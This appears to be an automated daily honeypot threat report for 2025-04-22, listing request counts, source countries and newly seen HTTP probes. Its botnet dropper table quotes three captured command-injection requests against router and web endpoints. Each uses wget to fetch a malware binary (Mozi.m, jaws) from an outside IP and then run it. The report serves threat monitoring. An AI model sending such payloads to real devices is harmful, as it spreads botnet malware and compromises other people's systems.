Daily Report: 2025-04-22#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 27 new requests that have never been observed before (these were added to the monitored request database.).
A total of 7612 requests were recorded during the day, originating from 3 different countries, with a peak of 6185 requests coming from SC.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
104.42.213.46 | GET /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo HTTP/1.1 |
122.97.138.102 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
45.230.66.35 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.35:11827/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
77 | 4 | POST /any HTTP/1.1 |
91 | 2 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
678 | 1 | GET /services/php.ini HTTP/1.1 |
1056 | 1 | GET /lms/dashboard/phpinfo.php HTTP/1.1 |
1452 | 1 | GET /live/lara/info.php HTTP/1.1 |
1962 | 1 | GET /wp-content/themes/secrets.json HTTP/1.1 |
2100 | 1 | \x00\x0E8\xC4\xEDv\xAC\xDA*\xC6\xEA\x00\x00\x00\x00\x00 |
2109 | 1 | \x00\x0E8\xEAHl\x0B\x9Cn\xFD\x96\x00\x00\x00\x00\x00 |
2111 | 1 | POST /api/user/binLookup?time=1745327114955715816 HTTP/1.1 |
2112 | 1 | GET /api/bin/440393?time=1745327114544332482 HTTP/1.1 |
2113 | 1 | GET /config/index?time=1745326096726238592 HTTP/1.1 |
2124 | 1 | \x00\x0E8O\xDB\xE0\x17\xC3D\x13\xB4\x00\x00\x00\x00\x00 |
2133 | 1 | \x00\x0E8\xAE1\xC9\x9AR\xDC\xC3\xAF\x00\x00\x00\x00\x00 |
2134 | 1 | \x00\x0E\x08\xAE1\xC9\x9AR\xDC\xC3\xAF\x00\x00\x00\x00\x00 |
2137 | 1 | \x00\x0E8R\x99\xFA FB%\x7F\x00\x00\x00\x00\x00 |
2139 | 1 | POST /api/user/binLookup?time=1745327064178202500 HTTP/1.1 |
2140 | 1 | GET /api/bin/440393?time=1745327063763103530 HTTP/1.1 |
2141 | 1 | GET /config/index?time=1745326058542704505 HTTP/1.1 |
2157 | 1 | \x00\x0E8dx8\x13\xA9\xB7\xB8\xD6\x00\x00\x00\x00\x00 |
2176 | 1 | \x00\x0E8\xA6M\x1D\x18\x09%\xBC6\x00\x00\x00\x00\x00 |
2180 | 1 | POST /api/user/binLookup?time=1745327682039014809 HTTP/1.1 |
2181 | 1 | GET /api/bin/440393?time=1745327681535733245 HTTP/1.1 |
2182 | 1 | GET /config/index?time=1745326516575261339 HTTP/1.1 |
2186 | 1 | \x00\x0E\x08 \x03Qd>\xEF\xEE\xF7\x00\x00\x00\x00\x00 |
2187 | 1 | \x00\x0E8 \x03Qd>\xEF\xEE\xF7\x00\x00\x00\x00\x00 |
4204 | 1 | POST /CGI/Execute HTTP/1.1 |
5087 | 1 | GET /client/lara/info.php HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 6185 | SC |
1 | 321 | GB |
2 | 277 | US |
3 | 164 | NL |
4 | 116 | CN |
5 | 91 | PL |
6 | 69 | HK |
7 | 57 | DE |
8 | 56 | CA |
9 | 47 | SG |
10 | 47 | JP |
11 | 28 | AU |
12 | 26 | KR |
13 | 15 | UA |
14 | 14 | AO |
15 | 10 | HR |
16 | 10 | GH |
17 | 8 | IL |
18 | 7 | TW |
19 | 7 | FR |
20 | 6 | PT |
21 | 5 | BE |
22 | 5 | RU |
23 | 4 | BR |
24 | 4 | BG |
25 | 3 | NG |
26 | 3 | IN |
27 | 3 | MC |
28 | 2 | TH |
29 | 2 | TR |
30 | 2 | AR |
31 | 2 | IE |
32 | 2 | GE |
33 | 2 | CZ |
34 | 2 | ES |
35 | 2 | HU |
36 | 2 | IT |
37 | 1 | NZ |
38 | 1 | EE |
39 | 1 | AZ |
40 | 1 | MK |
41 | 1 | HN |
42 | 1 | ID |